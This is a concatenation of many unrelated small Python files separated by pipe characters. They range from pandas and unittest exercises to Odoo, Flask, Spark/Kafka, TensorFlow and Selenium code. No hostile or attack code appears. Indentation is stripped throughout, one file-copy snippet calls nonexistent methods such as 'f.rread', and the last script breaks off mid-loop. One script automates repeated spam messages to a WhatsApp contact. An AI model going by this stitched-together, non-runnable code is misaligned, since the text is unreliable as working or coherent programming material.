#wget.download("https://kodim.cz/czechitas/progr2-python/python-pro-data-1/zakladni-dotazy/assets/staty.json")
staty = pandas.read_json("staty.json")
staty = staty.set_index("name")
#print(staty.info())
#print(staty.loc["Czech Republic":"Dominican Republic"])
#print(staty.loc["Uzbekistan":])
#print(staty.loc[["Czech Republic", "Slovakia"], "capital"])
#print(staty["population"])
#print(staty[["population", "area"]])
#populace = staty["population"]
#print(populace.sum())
#print(staty["population"] < 1000) // printuje False a True, nevymenuje staty
#pidistaty = staty[staty["population"] < 1000]
#print(pidistaty[["area", "population"]])
lidnate_evropske_staty = staty[(staty["population"] > 20_000_000) & (staty["region"] == "Europe")]
#print(lidnate_evropske_staty["population"])
vyznamne_staty = staty[(staty["population"] > 1_000_000_000) | (staty["area"] > 3_000_000)]
#print(vyznamne_staty[["population", "area"]])
zap_vych_evropa = staty[staty["subregion"].isin(["Western Europe", "Eastern Europe"])]
print(zap_vych_evropa) |
from unittest import TestCase, main
def soma(a, b):
return a + b
class Testes(TestCase):
def test_soma01(self):
self.assertEqual(soma(2,2), 4)
if __name__ == '__main__':
main()
|
def checkio(number):
m = 1
nums = [int(i) for i in str(number) if i != "0"]
for num in nums :
m *= num
return m
#These "asserts" using only for self-checking and not necessary for auto-testing
if __name__ == '__main__':
assert checkio(123405) == 120
assert checkio(999) == 729
assert checkio(1000) == 1
assert checkio(1111) == 1
|
"""
This directory holds 2 files:
currentWeather.py
pastFutureWeather.py
currentWeather.py accesses what is currently happening, uses owm.weather_manager() and a city ID
pastFutureWeather.py accesses yesterday's and the next 7 day's weather using owm.one_call() and Latitude and Longitude
""" |
# -*- coding: utf-8 -*-
{
'name': "aikchin_modifier_access_right",
'summary': """
Aik Chin Access Right""",
'description': """
Aik Chin Access Right
""",
'author': "Hashmicro / Luc",
'website': "http://www.hashmicro.com",
# Categories can be used to filter modules in modules listing
# Check https://github.com/odoo/odoo/blob/master/odoo/addons/base/module/module_data.xml
# for the full list
'category': 'Uncategorized',
'version': '0.1',
# any module necessary for this one to work correctly
'depends': ['base','account','delivery','crm','sale','point_of_sale','hr','customer_modifier','product_pack',
'aikchin_modifier_fields','partner_credit_limit','bi_generic_import','branch','aikchin_modifier_fields_sales',
'employee_appraisal'
],
# always loaded
'data': [
'security/aikchin_access_right.xml',
'views/views.xml',
'security/ir.model.access.csv',
'views/point_of_sale.xml',
'views/employee_evaluation.xml',
'views/human_resources.xml',
'security/access_group.xml',
'security/access_rights_group.xml',
],
# only loaded in demonstration mode
} |
import pytest
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from pages.basePage import BasePage
from data.dataRedirects import TEST_DATA_ABPO
from data.dataRedirects import TEST_DATA_DIFFERENT_DOMAIN
import utils.global_functions as gf
@pytest.fixture
def driver():
options = Options()
gf.setup(options)
driver = webdriver.Chrome(options=options)
yield driver
driver.close()
@pytest.mark.parametrize('test_url,redirect_url', TEST_DATA_ABPO)
def test_redirects_abpo_domain(driver, test_url, redirect_url):
base_page = BasePage(driver)
base_page.go_to_url(base_page.get_landing_page_url() + test_url)
assert base_page.get_current_url() == base_page.get_landing_page_url() + redirect_url
@pytest.mark.parametrize('test_url,redirect_url', TEST_DATA_DIFFERENT_DOMAIN)
def test_redirects_different_domain(driver, test_url, redirect_url):
base_page = BasePage(driver)
base_page.go_to_url(base_page.get_landing_page_url() + test_url)
assert base_page.get_current_url() == redirect_url
|
#反转字符串
def all():
name = input('输入文件名字')
f = open(name,'w')
f.write('123abcdefg')
con = name.rfind('.')
ff = open(name[0:con]+'_copy'+name[con:],'w')
def r_string():
book = f.rread(1)
if ff.rread=='':
return ''
else:
return ff.write(book)
r_string()
f.close()
ff.close()
all()
|
from django.contrib import admin
from .models import Article, Location
admin.site.register(Article)
admin.site.register(Location)
|
#!/usr/bin/env python3
"""Runs the ReQTL analysis using MatrixEQTL
Created on Aug, 29 2020
@author: Nawaf Alomran
This module is based off the sample code from Shabalin, et al (2012) which is
an R package "designed for fast eQTL analysis on large datasets that test for
association between genotype and gene expression using linear regression
including ANOVA genotype effects". For more information about the package,
please consider visiting the package's page at:
http://www.bios.unc.edu/research/genomic_software/Matrix_eQTL/
|--------------|
|Important Note|
|--------------|
Due to the lack of an equivalent python library to R package "MatrixEQTL" and
to my knowledge I believe that one good alternative to overcome this is by
using rpy2 library to interface with R codes, objects or even packages within
Python. It is noteworthy to cite the documentation of the rpy2 library that
rpy2 is "more efficient, better integrated with Python" than using subprocess.
More information is found in:
https://rpy2.github.io/doc/latest/html/introduction.html
Inputs + Options
-----------------
+ -s: the SNV or variant matrix file created from harmonize_matrices
+ -sl: the SNV location matrix file created from build_VAF_matrix
+ -ge: the gene expression matrix file created from build_gene-exp_matrix
+ -gl: the gene locations file created from build_gene-exp_matrix
+ -c: the covariates matrix file created from "harmonize_matrices".
[OPTIONAL]! you can also get the file under data if you wish
+ -o: the prefix for the path to the output files
+ -ct: logical (T or F) specifying whether to split the output into cis
or trans
+ -pcis: p-value thresholds for the cis output files
+ -ptran: p-value thresholds for the trans output files
+ -p: p-value thresholds for the unified output file
Output
-------
+ one output could be cis ReQTLs and trans ReQTLs or one with all of the
unified ReQTLs. This depends on what you choose for the value of parameter
"-ct"
+ one QQ plot of p-values
How to Run
----------
# execute it by splitting cis and trans
python -m PyReQTL.run_matrix_ReQTL \
-s output/ReQTL_test_VAF_matrix_harmonized.txt \
-sl output/ReQTL_test_VAF_loc_matrix.txt \
-ge output/ReQTL_test_gene-exp_matrix_harmonized.txt \
-gl output/ReQTL_test_gene-exp-loc_matrix.txt \
-c output/covariates_matrix_harmonized.txt \
-ct T \
-o "ReQTL_test" \
-pcis 0.001 \
-ptra 0.00001 \
-cli True
# execute by unified cis and trans
python -m PyReQTL.run_matrix_ReQTL \
-s output/ReQTL_test_VAF_matrix_harmonized.txt \
-sl output/ReQTL_test_VAF_loc_matrix.txt \
-ge output/ReQTL_test_gene-exp_matrix_harmonized.txt \
-gl output/ReQTL_test_gene-exp-loc_matrix.txt \
-c output/covariates_matrix_harmonized.txt \
-ct F \
-o "ReQTL_test" \
-p 0.001 \
-cli True
* Python runtime (T) with time 2.41s user 0.36s system 146% cpu 1.890 total
* R time command line 2.09s user 0.22s system 85% cpu 2.695 total
* Python runtime of (F) via time 2.24s user 0.37s system 151% cpu 1.730 total
* R time command line 1.70s user 0.18s system 88% cpu 2.131 total
"""
import argparse
import sys
from datetime import datetime
import rpy2.robjects as robjects # type: ignore
import rpy2.robjects as ro
from rpy2.robjects.packages import importr # type: ignore
try:
from common import (create_output_dir, output_filename_generator,
bool_conv_args)
except ModuleNotFoundError:
from PyReQTL.common import (create_output_dir, output_filename_generator,
bool_conv_args)
# use the following R operators to get and set R attributes
get_r_attribute = ro.baseenv['$']
set_r_attribute = ro.baseenv['$<-']
class MapTOS4(ro.methods.RS4):
"""Mapping SR4 class to Python class which will extend rpy2’s RS4.
This class will allow to access attributes or fields and method of
SlicedData class.
"""
def __init__(self, r_obj, file_slice_size=2000):
super().__init__(r_obj)
self.file_slice_size = file_slice_size
def load_file(self, filename):
"""Access the LoadFile method of SlicedData class
Parameters
----------
filename: the name of file to be loaded into SlicedData class
Return
-------
get the R method which load the filename
"""
return get_r_attribute(self, 'LoadFile')(filename)
@property
def file_slice_size(self):
"""Access the fileSliceSize field or attribute of SlicedData class
Parameters
----------
None
Return
-------
get the R attribute fileSliceSize
"""
return get_r_attribute(self, 'fileSliceSize')
@file_slice_size.setter
def file_slice_size(self, value):
"""Access the fileSliceSize field or attribute of SlicedData class
Parameters
----------
value: the value to be set for fileSliceSize field
Return
-------
None
"""
set_r_attribute(self, 'fileSliceSize', value)
def run_reqtl(args):
"""This function will be based off the sample code from Shabalin,
et al (2012) of the R package MatrixEQTL.
Parameters
----------
args: please read the above docstring (comments at the beginning of the
module) for more information about the arguments used.
Return
------
None
Output
------
- file either cis ReQTLs and trans ReQTLs or with all of the unified
ReQTLs.
- file QQ plot of p-values
"""
# check for installed package or install it, installing MatrixEQTL
r_str_download = """
testPkg <- function(x){
if (!require(x,character.only = TRUE))
{
install.packages("MatrixEQTL",dep=TRUE)
if(!require(x,character.only = TRUE)) stop("missing package!")
}
}
testPkg('MatrixEQTL')
"""
robjects.r(r_str_download)
# import utils package
utils = importr("utils")
# import base package
base = importr('base')
# import MatrixEQTL package
mql = importr("MatrixEQTL")
# import grDevices package
gr_devices = importr('grDevices')
start_time = datetime.now()
snv_filename = args.snv
snvs_data = MapTOS4(mql.SlicedData())
# load snv/genotype data into SlicedData class
snvs_data.load_file(snv_filename)
# load gene expression data file into SlicedData class
gene_express_filename = args.gen_exp
gene_exp_data = MapTOS4(mql.SlicedData(), file_slice_size=2000)
gene_exp_data.load_file(gene_express_filename)
# load Covariates data
# covar_filename = args.cov_mt
covar_data = MapTOS4(mql.SlicedData(), file_slice_size=1000)
snv_loc_filename = args.snv_loc
# need the utils package to read table for the downstream analysis
snv_pos = utils.read_table(snv_loc_filename, header=True,
stringsAsFactors=False)
gene_loc_filename = args.gen_loc
gene_pos = utils.read_table(gene_loc_filename, header=True,
stringsAsFactors=False)
# value of either C for cis and T for trans
cis_or_trans = args.ct
output = create_output_dir("output")
output_trans_file = output_filename_generator(output,
args.out_dir,
"_trans_ReQTLs.txt")
output_cis_file = output_filename_generator(output,
args.out_dir,
"_cis_ReQTLs.txt")
output_file_name = output_filename_generator(output,
args.out_dir,
"_all_ReQTLs.txt")
# call the matrix_eQTL_main of MatrixEQTL package in case of trans case
if cis_or_trans == "T":
mat_eqtl = mql.Matrix_eQTL_main(
snps=snvs_data,
gene=gene_exp_data,
cvrt=covar_data,
output_file_name=output_trans_file,
pvOutputThreshold=float(args.ptra),
useModel=117348,
verbose=False,
output_file_name_cis=output_cis_file,
pvOutputThreshold_cis=float(args.pcis),
snpspos=snv_pos,
genepos=gene_pos,
cisDist=1e6,
pvalue_hist="qqplot",
min_pv_by_genesnp=False,
noFDRsaveMemory=False
)
else:
mat_eqtl = mql.Matrix_eQTL_main(
snps=snvs_data,
gene=gene_exp_data,
output_file_name=output_file_name,
useModel=117348,
verbose=False,
pvOutputThreshold=float(args.p),
snpspos=snv_pos,
genepos=gene_pos,
pvalue_hist="qqplot",
min_pv_by_genesnp=False,
noFDRsaveMemory=False
)
ggplot_file = output_filename_generator(output, args.out_dir,
"_qqplot.tiff")
gr_devices.tiff(filename=ggplot_file)
base.plot(mat_eqtl)
gr_devices.dev_off()
if args.cli:
print(f"Analysis took {(datetime.now() - start_time).total_seconds()}"
f" sec")
def main() -> None:
"""Parses the command line arguments entered by the user
Parameters
----------
None
Returns
-------
None
"""
USAGE = """Runs the ReQTL analysis using MatrixEQTL package"""
parser = argparse.ArgumentParser(description=USAGE)
parser.add_argument('-s',
required=True,
dest='snv',
help="the SNV or variant matrix file from "
"harmonize_matrices")
parser.add_argument('-sl',
required=True,
dest='snv_loc',
help="the SNV location matrix file from build_"
"VAF_matrix")
parser.add_argument('-ge',
required=True,
dest="gen_exp",
help="gene expression file matrix from "
"build_gene-exp_matrix")
parser.add_argument('-gl',
required=True,
dest="gen_loc",
help="gene locations file from build_gene-exp_matrix")
parser.add_argument('-c',
dest="cov_mt",
help="""the covariates matrix file from "
"harmonize_matrices. [OPTIONAL]!""")
parser.add_argument('-o',
dest="out_dir",
required=True,
help="the prefix for the path to the output files")
parser.add_argument('-ct',
required=True,
help="logical (T or F) specifying whether to split "
"the output into cis or trans")
parser.add_argument('-pcis',
help="p-value thresholds for the cis output files")
parser.add_argument('-ptra',
help="p-value thresholds for the cis")
parser.add_argument('-p',
help="p-value thresholds for the unified output file")
parser.add_argument("-cli",
dest="cli",
default=False,
type=bool_conv_args,
help="""Whether the function is been executed with the
command line. Default is False!""")
args = parser.parse_args()
try:
run_reqtl(args)
except KeyboardInterrupt:
sys.exit('\nthe user ends the program')
if __name__ == '__main__':
main()
|
import json
from zipfile import ZipFile
from .resources import PebbleResources
class PebbleSystemResources(object):
def __init__(self, firmware_path):
self._firmware_path = firmware_path
self._zipfile = ZipFile(firmware_path)
self._manifest = json.loads(self._zipfile.read('manifest.json'))
self._resource_data = self._zipfile.read('system_resources.pbpack')
self.resources = PebbleResources(self._resource_data)
self.resource_id_mapping = self.get_resource_id_mapping()
def get_resource_id_mapping(self):
resource_id_mapping = {}
media = self._manifest['debug']['resourceMap']['media']
file_id = 0
for media_entry in media:
file_id += 1
resource_name = 'RESOURCE_ID_' + media_entry['defName']
if media_entry['type'] == 'png-trans':
resource_id_mapping[resource_name + '_WHITE'] = file_id
file_id += 1
resource_id_mapping[resource_name + '_BLACK'] = file_id
else:
resource_id_mapping[resource_name] = file_id
return resource_id_mapping
def verify_data(self):
return self.resources.verify_data()
def get_file_id(self, def_name):
return self.resource_id_mapping[def_name]
def get_chunk(self, file_id):
return self.resources.get_chunk(file_id)
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
import numpy as np
from tqdm import tqdm
from collections import Counter
import logging
class Vocab(object):
def __init__(self):
self.token2id, self.id2token, self.token_cnt = {}, {}, {}
self.pad_token = '<PAD>'
self.unk_token = '<UNK>'
self.initial_tokens = [self.pad_token, self.unk_token]
for token in self.initial_tokens:
self.add(token)
def add(self, token, cnt=1):
"""
adds the token to vocab
:param token: a string
:param cnt: a num indicating the count of the token to add, default is 1
:return: idx
"""
if token in self.token2id:
idx = self.token2id[token]
else:
idx = len(self.id2token)
self.id2token[idx] = token
self.token2id[token] = idx
if cnt > 0:
if token in self.token_cnt:
self.token_cnt[token] += cnt
else:
self.token_cnt[token] = cnt
return idx
def size(self):
return len(self.id2token)
def get_id(self, token):
try:
return self.token2id[token]
except KeyError:
return self.token2id[self.unk_token]
def get_token(self, idx):
try:
return self.id2token[idx]
except KeyError:
return self.unk_token
def convert_to_ids(self, tokens):
"""
Convert a list of tokens to ids, use unk_token if the token is not in vocab.
:param tokens: tokens: a list of token
:return: a list of ids
"""
vec = [self.get_id(label) for label in tokens]
return vec
def recover_from_ids(self, ids, stop_id=None):
"""
Convert a list of ids to tokens, stop converting if the stop_id is encountered
:param ids: a list of ids to convert
:param stop_id: the stop id, default is None
:return: a list of tokens
"""
tokens = []
for i in ids:
tokens += [self.get_token(i)]
if stop_id is not None and i == stop_id:
break
return tokens
def filter_tokens_by_cnt(self, min_cnt):
filtered_tokens = [token for token in self.token2id if self.token_cnt[token] >= min_cnt]
# rebuild the token x id map
self.token2id = {}
self.id2token = {}
for token in self.initial_tokens:
self.add(token, cnt=0)
for token in filtered_tokens:
self.add(token, cnt=0) |
from functools import reduce
quiz_grades = [98, 94, 96, 97, 99, 97]
print(reduce(lambda total, element: total+element, quiz_grades))
user_string = input('String:').split(',')
sorted_string = sorted(user_string)
print(sorted_string)
def char_counter(string_to_count):
char_counts = {}
for char in string_to_count:
if char in char_counts:
char_counts[char] += 1
else:
char_counts[char] = 1
return char_counts
print(char_counter("how are you today?"))
# I couldn't figure out the last one
# Went over it in class
""""
Alex's way
#1 the first way
from functools import reduce
def list_sum(list_to_sum):
return reduce(lambda total,next_element: total + next_element,list_to_sum)
my_list=[98, 94, 96, 97, 99, 97]
print(list_sum(my_list))
#1 a different way
def list_sum(list_to_sum):
return sum(list_to_sum)
my_list=[98, 94, 96, 97, 99, 97]
print(sum(my_list))
def string_sorter(string_to_sort):
string_to_list = string_to_sort.split(",")
string_to_list.sort()
return ",".join(string_to_list)
print(string_sorter("orange,banana,apple,lemon"))
def char_counter(string_to_count):
char_counts = {}
for char in string_to_count:
if char in char_counts:
char_counts[char] += 1
else:
char_counts[char] = 1
return char_counts
print(char_counter("how are you today?"))
""" |
import inspect
import re
import time
from abc import ABC, abstractmethod
from contextlib import suppress
from typing import Any, Callable, Union, List, Dict
import decorator
class JunitDecorator(ABC):
_func: Union[Callable, None]
_start_time: Union[float, None]
_stack_locals: List[Dict[str, Any]]
def __init__(self) -> None:
self._func = None
self._start_time = None
self._stack_locals = list()
def __call__(self, function: Callable) -> Callable:
"""
:param function: Decorated function
:return: Wrapped function
"""
self._func = function
self._on_call()
def wrapper(_, *args, **kwargs):
return self._wrapper(function, *args, **kwargs)
return decorator.decorator(wrapper, function)
def __str__(self) -> str:
return f"{self.__class__.__name__} {self.name}"
def __repr__(self) -> str:
return f"{self.__class__.__name__} {self.name}"
@property
def name(self):
return self._func.__name__
def _wrapper(self, function: Callable, *args, **kwargs):
value = None
with suppress(BaseException):
self._on_wrapper_start(function)
try:
value = self._execute_wrapped_function(*args, **kwargs)
except BaseException as e:
self._on_exception(e)
finally:
with suppress(BaseException):
self._on_wrapper_end()
return value
def _get_class_name(self) -> str:
"""
Get class name of which the decorated function contained in it.
If class doesn't exists, it returns the module name
:return: class or module name
"""
module = inspect.getmodule(self._func)
try:
classname, _ = re.compile(r"(\w+)\.(\w+)\sat\s").findall(str(self._func))[0]
return classname
except IndexError:
return inspect.getmodulename(inspect.getmodule(module).__file__)
@abstractmethod
def _on_wrapper_end(self) -> None:
"""
Executed after execution finished (successfully or not)
:return: None
"""
def _on_call(self) -> None:
"""
Executed on __call__ start.
:return: None
"""
def _execute_wrapped_function(self, *args, **kwargs) -> Any:
"""
Execute wrapped function and return its value.
Exceptions in this function will be caught by _on_exception
:param args: Arguments passed to the function
:param kwargs: Key arguments passed to the function
:return: Wrapped function return value
"""
return self._func(*args, **kwargs)
def _on_exception(self, e: BaseException) -> None:
"""
This function executed when exception is raised within the wrapped function
:param e: Raised BaseException
:return: None
"""
raise
def _on_wrapper_start(self, function) -> None:
"""
This function executed when wrapper function starts
:return: None
"""
self._start_time = time.time()
self._stack_locals = [frame_info.frame.f_locals for frame_info in inspect.stack()]
|
#!/usr/bin/env python
# encoding: utf-8
import os
import numpy as np
import time
from configparser import RawConfigParser, NoSectionError
import matplotlib.ticker
import matplotlib.dates as mpd
class ExperimentConfigFile(RawConfigParser, matplotlib.ticker.Formatter):
def __init__(self, path, fname=None):
RawConfigParser.__init__(self)
self.path = path
if fname is None:
if os.path.isfile(os.path.join(path, 'config.txt')):
self.fname = 'config.txt'
else:
self.fname = filter(lambda x: x.startswith('config')
and x.endswith('.txt'), os.listdir(path))[0]
else:
self.fname = fname
self.read(os.path.join(path, self.fname))
def gettime(self, sec):
"""Convert start and end time and date read from section sec
(might be a list)
of the config file
to a tuple of times from epoch."""
if type(sec) == list:
starts = []
ends = []
for ss in sec:
st, et = self.gettime(ss)
starts.append(st)
ends.append(et)
return min(starts), max(ends)
else:
tstr1 = self.get(sec, 'startdate') + self.get(sec, 'starttime')
tstr2 = self.get(sec, 'enddate') + self.get(sec, 'endtime')
if len(tstr1) == 15:
t1 = time.strptime(tstr1, '%d.%m.%Y%H:%M')
elif len(tstr1) == 18:
t1 = time.strptime(tstr1, '%d.%m.%Y%H:%M:%S')
else:
raise Exception('Wrong date format in %s' %self.fname)
if len(tstr2) == 15:
t2 = time.strptime(tstr2, '%d.%m.%Y%H:%M')
elif len(tstr2) == 18:
t2 = time.strptime(tstr2, '%d.%m.%Y%H:%M:%S')
else:
raise Exception('Wrong date format in %s' %self.fname)
return time.mktime(t1), time.mktime(t2)
def __call__(self, x, pos=0):
x = mpd.num2epoch(x)
for sec in self.sections():
t1, t2 = self.gettime(sec)
if t1 <= x and x < t2:
return sec
return 'Unknown' |
from typing import Tuple, List
class Dice:
def __init__(self, top, left, front, cost=0):
self.top = top
self.bottom = 7 - top
self.left = left
self.right = 7 - left
self.front = front
self.back = 7 - front
self.cost = cost
def __repr__(self):
return f'Dice(top: {self.top}, left: {self.left}, front: {self.front}, cost: {self.cost})'
@property
def state(self):
return self.top, self.left, self.front
def move_down(self):
# left, right does not change
self.top, self.bottom, self.front, self.back = \
self.back, self.front, self.top, self.bottom
self.cost += self.bottom
return self
def move_right(self):
# front, end does not change
self.top, self.bottom, self.left, self.right = \
self.left, self.right, self.bottom, self.top
self.cost += self.bottom
return self
def copy(self):
return Dice(self.top, self.left, self.front, self.cost)
def rotate_clockwise(self):
self.left, self.right, self.back, self.front = \
self.front, self.back, self.left, self.right
return self
def rotate_counterclockwise(self):
self.left, self.right, self.back, self.front = \
self.back, self.front, self.right, self.left
return self
class Solution:
def findMinStepsForUnKnownState(self, A: Tuple[int, int], B: Tuple[int, int]):
all_possible = [Dice(1, 2, 3), Dice(2, 6, 3), Dice(3, 5, 1), Dice(4, 6, 2), Dice(5, 4, 1), Dice(6, 4, 5)]
res = []
for p in all_possible:
res.append(self.findABSteps(A, B, p))
res.append(self.findABSteps(A, B, p.rotate_clockwise()))
res.append(self.findABSteps(A, B, p.rotate_clockwise().rotate_clockwise()))
res.append(self.findABSteps(A, B, p.rotate_counterclockwise()))
return min(res)
def findABSteps(self, A: Tuple[int, int], B: Tuple[int, int], dice_state):
# if the dice is in a given state
M, N, new_dice_state = self.rotate_dice_wisely(A, B, dice_state)
return self.findLowestCostInMN(M, N, new_dice_state)
def rotate_dice_wisely(self, A: Tuple[int, int], B: Tuple[int, int], dice_state: Dice):
# B is same as A or B is in bottom-right direction: no need to rotate
if A[0] <= B[0] and A[1] <= B[1]:
return B[0] - A[0], B[1] - A[1], dice_state.copy()
# B is in top-right, rotate clockwise
if A[0] > B[0] and A[1] < B[1]:
return A[0] - B[0], B[1] - A[1], dice_state.copy().rotate_clockwise()
# B is in bottom-left,
if A[0] < B[0] and A[1] > B[1]:
return B[0] - A[0], A[1] - B[1], dice_state.copy().rotate_counterclockwise()
# B is in top-left:
if A[0] > B[0] and A[1] > B[1]:
return A[0] - B[0], A[1] - B[1], dice_state.copy().rotate_clockwise().rotate_clockwise()
def findLowestCostInMN(self, M: int, N: int, initial_dice: Dice):
if M == 0 and N == 0:
return 0
dp: List[List[List[Dice]]] = [[None] * N for _ in range(M)]
for i in range(M):
for j in range(N):
if i == 0 and j == 0:
dp[0][0] = [initial_dice]
elif i == 0:
dp[0][j] = [x.copy().move_right() for x in dp[0][j-1]]
elif j == 0:
dp[i][0] = [x.copy().move_down() for x in dp[i-1][0]]
else:
# top states move down + left states move right
tmp_all_states = [x.copy().move_down() for x in dp[i-1][j]] + [x.copy().move_right() for x in dp[i][j-1]]
unique_states = set(x.state for x in tmp_all_states)
filtered_states = []
# only keep a lowest cost state for all states in the same position state
for state in unique_states:
state_with_min_cost = min([s for s in tmp_all_states if s.state == state], key=lambda x: x.cost)
filtered_states.append(state_with_min_cost)
dp[i][j] = filtered_states
# print('last state', dp[-1][-1])
return min(x.cost for x in dp[-1][-1])
if __name__ == '__main__':
# If the Dice state is given
ans1 = Solution().findABSteps([2, 8], [3, 1], Dice(6, 2, 4))
print(f'Answer for given state between [2, 8] and [3, 1] is {ans1}')
# If the Dice state is not given
ans2 = Solution().findMinStepsForUnKnownState([0, 0], [8, 8])
print(f'Answer for unknown dice state is {ans2}')
|
from flask import Flask, jsonify, request
from sklearn.externals import joblib
from flask_cors import CORS
# for printing to console for testing
import sys
from helpers import create_df
from helpers import prep_df
from helpers import groupby_to_dict
from sklearn.linear_model import LogisticRegression
from sklearn.linear_model import LinearRegression
app = Flask(__name__)
# allowing CORS to make calls across local environment
CORS(app)
@app.route('/')
def welcome_page():
return "Hi! This is my little bike-share API!"
@app.route('/simulation', methods=['POST'])
def create_simulation():
req = request.get_json()
print(req, file=sys.stderr)
# creates a df of variables based on given month
init_df = create_df()
model_df = prep_df(init_df, req['month'])
# run location model to find destination probabilities
location_probs = location_model.predict_proba(model_df)
# run frequency model to find how many bikes are rented in an hour
frequency_probs = frequency_model.predict(model_df)
return_locations = location_probs.tolist()
return_frequencies = frequency_probs.tolist()
# construct one df with vars and predictions
combined_df = init_df.copy()
combined_df['count'] = frequency_probs
for i, station in enumerate(init_df['Starting Station ID'].unique()):
combined_df[station] = location_probs[:, i]
print(combined_df.columns, file=sys.stderr)
# groupby to get path to predictions from the given variables
grouped = combined_df.groupby(['Time_of_Day', 'Starting Station ID']).count()
# convert to json, which is easier understood by client
result = groupby_to_dict(grouped)
return jsonify({'predictions': result})
if __name__ == '__main__':
# loads pickled models
location_model = joblib.load('./models/location.p')
frequency_model = joblib.load('./models/frequency.p')
app.run(port=4000)
|
from functools import reduce
def transformar_lista(elemento) -> list:
salida = []
aux = []
for elementox in elemento[1:]:
aux.append(elementox[1])
temp = [elemento[0], reduce(lambda acumulador = 0, elemento = 0: acumulador + elemento, aux)]
salida= temp
return salida
def informe(examenes_medicos: list) -> list:
salida = list(map(transformar_lista, examenes_medicos))
contador = 0
for lista in examenes_medicos:
for elemento in lista[1:]:
if elemento[0] == "EL_PCOVID":
contador += 1
salida.append(contador)
return salida |
from pyspark.streaming.kafka import KafkaUtils
from pyspark import SparkContext
from pyspark.streaming import StreamingContext
import sys
import json
sc = SparkContext.getOrCreate()
sc.stop()
sc = SparkContext(appName = "PythonStreamingReciever")
ssc = StreamingContext(sc, 5)
kafkaStream = KafkaUtils.createStream(ssc, 'localhost:2181', 'spark-streaming', {'province':1})
lines = kafkaStream.map(lambda x:x[1])
counts = lines.flatMap(lambda line:line.split(" ")).map(lambda word:(word,1)).reduceByKey(lambda a,b:a+b)
counts.pprint()
from kafka import KafkaProducer
producer = KafkaProducer(bootstrap_servers = 'localhost:9092')
def process(rdd):
print(rdd)
message = json.dumps(rdd.map(lambda x:[str(x[0]),str(x[1])]).collect())
producer.send('result', message.encode('utf-8'))
counts.foreachRDD(process)
ssc.start()
ssc.awaitTermination()
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from time import sleep
driver=webdriver.Chrome()
add='https://web.whatsapp.com/'
driver.get(add)
wait=WebDriverWait(driver, 60)
sleep(6)
user=wait.until(EC.presence_of_element_located((By.XPATH,"//span[@title='{}']".format("//enter contact name here"))))
user.click()
for i in range(0,6,1):
text=wait.until(EC.presence_of_element_located((By.CLASS_NAME,'_2A8P4')))
text.send_keys("HIIIIIIIIIIII " *(i+1))
send=wait.until(EC.presence_of_element_located((By.CSS_SELECTOR,'#main > footer > div.vR1LG._3wXwX.copyable-area > div:nth-child(3) > button > span')))
send.click()
sleep(0.5)
|
import win32gui
def list_window_names():
def winEnumHandler(hwnd, ctx):
if win32gui.IsWindowVisible(hwnd):
print(hex(hwnd), win32gui.GetWindowText(hwnd))
win32gui.EnumWindows(winEnumHandler, None)
list_window_names()
|
import numpy as np
import tensorflow as tf
import math
from dataset import MnistDataset
IMG_SIZE = 28
class CNNMnistLayer:
def __init__(self, filters: list, kernel_size: int = 3, name: str = None):
self.layers = []
self.name = name
for index, filter_count in enumerate(filters):
self.layers.append(tf.compat.v1.layers.Conv2D(filters=filter_count,
kernel_size=kernel_size, name=f'conv2d_{index}',
input_shape=(IMG_SIZE, IMG_SIZE, 1),
padding='same',
activation=tf.nn.relu))
self.layers.append(tf.compat.v1.layers.MaxPooling2D(pool_size=[2, 2], strides=2,
name=f'maxpool2d_{index}'))
def __call__(self, input_tensor: tf.Tensor):
with tf.name_scope(self.name):
for layer in self.layers:
output = layer(input_tensor)
input_tensor = output
return output
class Network:
def __init__(self):
self.logits = None
def get_network(self):
X = tf.placeholder(tf.float32, shape=(None, IMG_SIZE, IMG_SIZE, 1), name='input')
cnn_layers_0 = CNNMnistLayer([32, 64], kernel_size=3, name='cnn_layer_0')
# batch_norm_layer = tf.layers.BatchNormalization()
# cnn_layers_1 = CNNMnistLayer([64], kernel_size=3, name='cnn_layer_1')
dense = tf.compat.v1.layers.Dense(1024, activation=tf.nn.relu)
logits = tf.compat.v1.layers.Dense(10, activation=tf.nn.softmax, name='logits')
mnist_nn = cnn_layers_0(X)
# mnist_nn = cnn_layers_1(mnist_nn)
# mnist_nn = tf.reshape(mnist_nn, [-1, 3 * 3 * 64])
mnist_nn = tf.reshape(mnist_nn, [-1, 7 * 7 * 64])
mnist_nn = dense(mnist_nn)
self.logits = logits(mnist_nn)
return self.logits
class Train:
def __init__(self, network: tf.Tensor):
self.network = network
self.mnist = MnistDataset()
self.loss = None
def train(self):
train_number = len(self.mnist.train_labels)
batch_size = 1000
batches_number = math.ceil(train_number / batch_size)
epochs_number = 20
with tf.Session() as sess:
sess.run(tf.compat.v1.initializers.global_variables())
tf.summary.FileWriter('./tb_logs', sess.graph)
# deal with epochs
for n_epoch in range(epochs_number):
# deal with batches
for batch_number in range(batches_number):
labels = np.eye(10)[self.mnist.train_labels[batch_number*batch_size:(batch_number+1)*batch_size]]
self.loss = tf.compat.v1.losses.mean_squared_error(labels, self.network)
optimizer = tf.train.GradientDescentOptimizer(0.01).minimize(self.loss)
images = self.mnist.train_images[batch_number*batch_size:(batch_number+1)*batch_size]
_, loss_val = sess.run([optimizer, self.loss], feed_dict={'input:0': images})
print(f'Epoch number: {n_epoch}, batch number: {batch_number}: loss: {loss_val}')
print(f'Loss after epoch {n_epoch}: {loss_val}')
|
from urllib import request, parse
url = 'http://httpbin.org/post'
header = {
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
'Host': 'httpbin.org'
}
dict = {
'name': 'test'
}
data = bytes(parse.urlencode(dict), encoding='utf8')
req = request.Request(url=url, data=data, headers=header, method='POST')
res = request.urlopen(req)
print(res.read().decode('utf-8')) |
from dao.abstractDAO import AbstractDAO
from entidades.aluno import Aluno
class AlunoDAO(AbstractDAO):
def __init__(self) -> None:
super().__init__('alunos.pkl')
def get(self, key):
if isinstance(key, int):
return super().get(key)
def add(self, matricula, aluno):
if (aluno is not None) and (isinstance(aluno, Aluno) and (isinstance(matricula, int))):
return super().add(matricula, aluno)
def remove(self, key):
if isinstance(key, int):
return super().remove(key)
def getAll(self):
return super().getAll()
|
import turtle,random
turtle.width(10)
turtle.speed(0)
x=0
colors=["red","blue","cyan","magenta","gold","gray","black","yellow","orange","green"]
while True:
